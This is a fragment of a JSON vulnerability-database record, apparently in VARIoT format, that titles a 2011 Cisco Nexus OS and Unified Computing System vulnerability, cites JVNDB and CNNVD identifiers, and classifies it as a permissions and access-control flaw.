"data": "Cisco Nexus OS and Cisco Unified Computing System Vulnerability gained in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-002700"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201110-586"
}
],
"trust": 0.6
}
}